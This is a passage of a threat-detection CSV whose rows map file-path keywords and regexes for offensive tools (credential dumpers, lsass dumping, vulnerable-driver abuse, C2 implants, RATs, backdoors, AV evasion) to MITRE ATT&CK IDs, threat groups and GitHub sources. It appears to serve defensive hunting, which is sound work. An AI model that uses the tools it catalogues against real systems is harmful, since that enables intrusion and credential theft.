TA0009","N/A","Dispossessor","Discovery","https://github.com/fashionproof/SearchOpenFileShares","1","0","N/A","N/A","7","1","29","6","2019-12-13T12:37:42Z","2019-09-21T13:50:26Z","19295" "*\temp\pwned.trx*",".{0,1000}\\temp\\pwned\.trx.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","19296" "*\Temp\Reaper.exe*",".{0,1000}\\Temp\\Reaper\.exe.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","19297" "*\Temp\RTCore64.sys*",".{0,1000}\\Temp\\RTCore64\.sys.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","N/A","10","10","933","139","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z","19298" "*\Temp\tor\control-port-*",".{0,1000}\\Temp\\tor\\control\-port\-.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","19302" "*\Temp\tor\torrc-*",".{0,1000}\\Temp\\tor\\torrc\-.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","19303" "*\temp\trick.zip*.json*",".{0,1000}\\temp\\trick\.zip.{0,1000}\.json.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","19304" "*\Temp\Wdlogfile.log*",".{0,1000}\\Temp\\Wdlogfile\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","19305" "*\Temp\whoami.txt*",".{0,1000}\\Temp\\whoami\.txt.{0,1000}","offensive_tool_keyword","crackmapexec","CrackMapExec behavior","T1087.002 - 
T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0001 - TA0002 - TA0007 - TA0008","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Lateral Movement","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","19306" "*\Temp\whoami.txt*",".{0,1000}\\Temp\\whoami\.txt.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","19307" "*\Temp\WinAuditDB.accdb*",".{0,1000}\\Temp\\WinAuditDB\.accdb.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","19308" "*\Temp\YANRI_TEMP_*",".{0,1000}\\Temp\\YANRI_TEMP_.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","N/A","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","19311" "*\termsrv.patch.dll*",".{0,1000}\\termsrv\.patch\.dll.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 
- T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","N/A","9","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","19312" "*\teslacrypt.txt*",".{0,1000}\\teslacrypt\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","19313" "*\Test.PME",".{0,1000}\\Test\.PME","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","19314" "*\test_mitm_initialization.py*",".{0,1000}\\test_mitm_initialization\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","19315" "*\testEnvExit.exe*",".{0,1000}\\testEnvExit\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 
- T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","19318" "*\TestNetConnectionCommand.cs",".{0,1000}\\TestNetConnectionCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","19319" "*\tests\beacon64.bin*",".{0,1000}\\tests\\beacon64\.bin.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","N/A","10","10","1109","180","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z","19320" "*\TexttoExe.ps1*",".{0,1000}\\TexttoExe\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","19321" "*\TGSThief\*",".{0,1000}\\TGSThief\\.{0,1000}","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","0","N/A","N/A","9","2","181","27","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z","19322" "*\TGT_Monitor.ps1*",".{0,1000}\\TGT_Monitor\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","19323" "*\TGT_Monitor.ps1*",".{0,1000}\\TGT_Monitor\.ps1.{0,1000}","offensive_tool_keyword","TGT_Monitor","This script continuously monitors cache for new TGTs and displays them on the screen (admin privs required)","T1557.001 - T1040","TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/TGT_Monitor","1","0","N/A","N/A","9","1","3","0","2023-11-08T18:48:55Z","2023-11-07T22:53:45Z","19324" "*\thanatos.dll*",".{0,1000}\\thanatos\.dll.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in 
rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","N/A","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","19325" "*\thanatos.exe*",".{0,1000}\\thanatos\.exe.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","N/A","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","19326" "*\the-backdoor-factory\*",".{0,1000}\\the\-backdoor\-factory\\.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","19327" "*\Theif.dll*",".{0,1000}\\Theif\.dll.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","19328" "*\ThemeBleed.exe *",".{0,1000}\\ThemeBleed\.exe\s.{0,1000}","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tool","https://github.com/gabe-k/themebleed","1","0","N/A","N/A","10","2","196","37","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z","19329" 
"*\ThemeBleed.sln*",".{0,1000}\\ThemeBleed\.sln.{0,1000}","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tool","https://github.com/gabe-k/themebleed","1","0","N/A","N/A","10","2","196","37","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z","19330" "*\TheThing.exe*",".{0,1000}\\TheThing\.exe.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","19331" "*\ThievingFox.py*",".{0,1000}\\ThievingFox\.py.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","19332" "*\thread-injector.exe*",".{0,1000}\\thread\-injector\.exe.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","19333" "*\Throwback.exe*",".{0,1000}\\Throwback\.exe.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - 
T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","19334" "*\Throwback\Throwback.h*",".{0,1000}\\Throwback\\Throwback\.h.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","19335" "*\ThrowbackDLL\*",".{0,1000}\\ThrowbackDLL\\.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","19336" "*\Throwback-master.zip*",".{0,1000}\\Throwback\-master\.zip.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","19337" "*\ThunderFox.exe*",".{0,1000}\\ThunderFox\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","19338" "*\Thycotic.ihawu.EncryptionProtection_x64.dll*",".{0,1000}\\Thycotic\.ihawu\.EncryptionProtection_x64\.dll.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret 
Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","0","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","19339" "*\Thycotic.ihawu.EncryptionProtection_x86.dll*",".{0,1000}\\Thycotic\.ihawu\.EncryptionProtection_x86\.dll.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","0","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","19340" "*\thycotic_secretserver_dump.rb*",".{0,1000}\\thycotic_secretserver_dump\.rb.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","0","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","19341" "*\ticket_converter.py*",".{0,1000}\\ticket_converter\.py.{0,1000}","offensive_tool_keyword","ticket_converter","A little tool to convert ccache tickets into kirbi (KRB-CRED) and vice versa based on impacket.","T1558.003 - T1110.004","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/zer1t0/ticket_converter","1","0","N/A","N/A","10","2","167","31","2022-06-16T19:38:05Z","2019-05-14T04:48:19Z","19342" "*\ticketConverter.py*",".{0,1000}\\ticketConverter\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","19343" "*\ticketer.exe*",".{0,1000}\\ticketer\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","19344" "*\ticketer.py*",".{0,1000}\\ticketer\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","19345" "*\Tickets\KerbDump*",".{0,1000}\\Tickets\\KerbDump.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","19346" "*\TIG3R RAT v*.exe*",".{0,1000}\\TIG3R\sRAT\sv.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19347" "*\TikiCompiler.txt*",".{0,1000}\\TikiCompiler\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","19351" "*\TikiService.exe*",".{0,1000}\\TikiService\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. 
Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","19352" "*\TikiSpawn.*",".{0,1000}\\TikiSpawn\..{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. 
